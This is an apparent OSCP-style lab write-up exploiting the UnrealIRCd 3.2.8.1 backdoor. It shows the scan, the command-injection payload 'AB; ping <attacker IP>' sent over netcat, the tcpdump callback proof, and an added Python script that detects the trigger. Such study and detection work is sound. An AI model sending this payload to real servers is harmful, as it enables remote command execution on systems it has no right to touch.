┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.81.120 -p 6667,6697,8067
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
Service Info: Host: irc.foonet.com
Found the hostname irc.foonet.com, so we add it to /etc/hosts.
After trying ports 6667 and 6697 one by one, only port 8067 could be reached from the web browser, and it returned the following error messages:
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.foonet.com 451 GET :You have not registered
:irc.foonet.com 451 Host: :You have not registered
:irc.foonet.com 451 User-Agent: :You have not registered
:irc.foonet.com 451 Accept: :You have not registered
:irc.foonet.com 451 Accept-Language: :You have not registered
:irc.foonet.com 451 Accept-Encoding: :You have not registered
:irc.foonet.com 451 Connection: :You have not registered
:irc.foonet.com 451 Upgrade-Insecure-Requests: :You have not registered
ERROR :Closing Link: [192.168.49.81] (Ping timeout)
┌──(kali㉿VirtualBox)-[~]
└─$ searchsploit unrealirc
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Executi | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stac | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execut | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Not much to do here, as these rely on the Metasploit module, and for OSCP's sake we are not using Metasploit.
There is one PoC for UnrealIRCd from 2010: https://lwn.net/Articles/392201/
The payload is as follows:
AB; ping <attacker IP>
So first we set up a tcpdump listener that will show us whether we get a ping back to our box:
┌──(kali㉿VirtualBox)-[~]
└─$ sudo tcpdump -i tun0 icmp
Then we run netcat to connect to the IRC port:
┌──(kali㉿VirtualBox)-[~]
└─$ nc 192.168.81.120 6667 -vvv
While netcat is running, keep the connection open and paste the payload directly into it:
┌──(kali㉿VirtualBox)-[~]
└─$ nc 192.168.81.120 6667 -vvv
192.168.81.120: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.81.120] 6667 (ircd) open
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
**AB; ping 192.168.49.81**
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
The end result is our tcpdump listener receiving the callback:
┌──(kali㉿VirtualBox)-[~]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:27:22.971392 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 314, length 64
10:27:22.971403 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 314, length 64
10:27:23.995448 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 315, length 64
10:27:23.995463 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 315, length 64
10:27:25.019573 IP irc.foonet.com > 192.168.49.81: ICMP echo request, id 980, seq 316, length 64
10:27:25.019586 IP 192.168.49.81 > irc.foonet.com: ICMP echo reply, id 980, seq 316, length 64
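As an added detection example (not part of the writeup), the Python below scans client-to-server IRC lines for the "AB;" trigger prefix shown above and pulls any IPv4 address out of the trailing command, so the hit can be correlated with the outbound ICMP echo seen in the tcpdump output. The sample lines are constructed, not captured traffic.

```python
import re

# Trigger prefix of the UnrealIRCd 3.2.8.1 backdoor as shown in the writeup:
# a client line that begins with "AB;" has its remainder executed by the server.
TRIGGER_PREFIX = b"AB;"

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample of client-to-server lines, as a sensor reassembling the
# TCP stream to port 6667 would see them (not real capture data).
SAMPLE_CLIENT_LINES = [
    b"NICK defender\r\n",
    b"USER defender 0 * :Blue Team\r\n",
    b"PRIVMSG #ops :AB; is just text inside a message\r\n",
    b"AB; ping 192.168.49.81\r\n",
    b"JOIN #ops\r\n",
]


def find_backdoor_triggers(lines):
    """Return (line_number, command) for every line that starts with "AB;".

    Only the start of the line matters: the backdoor checks the first bytes of
    the received buffer, so "AB;" inside a PRIVMSG body is not a trigger.
    """
    hits = []
    for n, raw in enumerate(lines, start=1):
        line = raw.rstrip(b"\r\n")
        if line.startswith(TRIGGER_PREFIX):
            cmd = line[len(TRIGGER_PREFIX):].strip().decode("utf-8", "replace")
            hits.append((n, cmd))
    return hits


def extract_ipv4(command):
    """IPv4 addresses in the command, to match against outbound ICMP/TCP from the server."""
    return IPV4_RE.findall(command)


def summarize(hits):
    """One alert string per hit, suitable for forwarding to a SIEM."""
    return [
        f"line {n}: UnrealIRCd backdoor trigger, command={cmd!r}, "
        f"callback_ips={extract_ipv4(cmd)}"
        for n, cmd in hits
    ]


if __name__ == "__main__":
    for msg in summarize(find_backdoor_triggers(SAMPLE_CLIENT_LINES)):
        print(msg)
```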